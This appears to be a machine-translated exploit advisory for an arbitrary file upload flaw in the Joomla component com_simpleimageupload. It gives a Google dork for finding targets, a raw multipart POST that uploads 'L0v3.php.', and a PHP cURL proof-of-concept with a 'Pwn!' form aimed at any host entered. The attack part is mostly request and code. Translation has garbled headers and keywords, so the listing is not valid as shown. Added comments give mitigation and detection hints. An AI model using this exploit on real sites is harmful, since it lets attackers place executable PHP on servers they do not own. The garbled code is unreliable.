Joomla Simple Image Upload (com_simpleimageupload) - Unggah File Sewenang-wenang (Arbitrary File Upload)

chmood

# Judul Exploit: Joomla Simple Image Upload - Arbitrary File Upload (unggah file sewenang-wenang)
# Google Dork: inurl: option = com_simpleimageupload
# Tanggal: 2015/06/23
# Exploit Penulis: CrashBandicotDosPerl
# Homepage Vendor: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Versi: 1.0
# Diuji pada: MsWin32

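# Kerentanan yang sama seperti pada com_media
#
# Catatan: nama file pada permintaan di bawah diakhiri dengan titik ("L0v3.php.") dan exploit ini diuji pada Windows.
# Tampaknya pemeriksaan ekstensi di komponen tidak menormalkan nama file sebelum memvalidasinya, sedangkan Windows
# membuang titik di akhir nama ketika file disimpan, sehingga file tersimpan dengan ekstensi .php. Kode komponen
# tidak ditampilkan di halaman ini, jadi dugaan ini perlu dikonfirmasi.
# Mitigasi: normalkan nama file lalu validasi dengan daftar ekstensi yang diizinkan di sisi server, simpan file
# dengan nama yang dibuat oleh server, nonaktifkan eksekusi PHP di direktori images/, dan hapus komponen ini
# bila tidak ada versi yang sudah diperbaiki.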

# Permintaan Langsung (Live Request):

POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP / 1.1

Host: 127.0.0.1
User-Agent: Mozilla / 5.0 (Windows NT 6.1; rv: 31.0) Gecko / 20100101 Firefox / 31.0
Terima: text / html, aplikasi / xhtml + xml, aplikasi / xml; q = 0,9, * / *; q = 0,8
Terima-Bahasa: en-us, en; q = 0,5
Terima-Encoding: gzip, mengempis
Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Koneksi: terus-hidup
Content-Type: multipart / form-data; batas = --------- 247062787817068

---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "Filedata"; filename = "L0v3.php." \ r \ n
Content-Type: application / x-php \ r \ n
\ r \ n
0wn3d! ;) \ r \ n
---------- 247062787817068 \ r \ n
Content-Disposition: form-data; name = "kembali-url" \ r \ n
\ r \ n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
---------- 247062787817068- \ r \ n

# Exploit:

<? php
// Proof-of-concept script from the advisory for the com_simpleimageupload upload flaw.
// It renders a small HTML form that takes a host name, and on POST sends one multipart
// upload through cURL to the component endpoint, then prints the server response.
// NOTE(review): this listing went through machine translation, so keywords, identifiers
// and quoting were altered and it is not valid PHP as shown. It is kept verbatim as a
// record of the advisory; read it for the request shape, not as runnable code.

gema '<form action = metode "#" = "post" enctype = "multipart / form-data">
<input type = "text" name = "target" value = "www.localhost.com" /> <input type = "submit" name = "Pwn" value = "Pwn!" />
</ form> ';

// Everything below runs only when the form above has been submitted.
if ($ _ POST) {

// Host name taken directly from the submitted form field.
$ target = $ _POST ['target'];

// Marker text used as the uploaded content, plus the headers that declare the upload part
// as PHP with a file name ending in a dot. Detection: a Filedata part whose file name ends
// in .php or in a trailing dot is the signal to alert on for this component.
$ file = "0wn3d! ;) ";
$ sundulan = array ("Content-Type: application / x-php",
"Content-Disposition: form-data; name = \ "Filedata \"; file = \ "L0v3.php \." ");

// Request goes to option=com_simpleimageupload with task=upload.upload. Web and WAF logs
// can be searched for POST requests carrying these two query parameters.
$ ch = curl_init(“http://”.$target.”/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component”);
curl_setopt ($ ch, CURLOPT_POST, true);
curl_setopt ($ ch, CURLOPT_USERAGENT, "Mozilla / 5.0 (Windows NT 6.3; WOW64) AppleWebKit / 537,36 (KHTML, seperti Gecko) Chrome / Safari 43.0.2357.124 / 537,36");
// Two form fields are sent: Filedata and a second field holding a base64 string. The string
// decodes to the upload view URL that also appears in the Referer of the captured request,
// so that field looks like a plain redirect target rather than part of the payload.
curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('Filedata' => "@ $ file", "kembali-url" => “aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=”,));
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_HTTPHEADER, $ header);
// The response body is captured and echoed back to the page.
$ hasil = curl_exec ($ ch);
curl_close ($ ch);
mencetak "$ hasil";

// The advisory states that the stored file ends up under images/ with a random prefix.
// On an affected site, PHP files inside that directory are an indicator to hunt for, and
// script execution there should be disabled at the web server.
} Else {die (); }
?>

# Jalur File: 127.0.0.1/images/[Rand0mString]L0v3.php
# Sh00t untuk Mr_AnarShi-T;



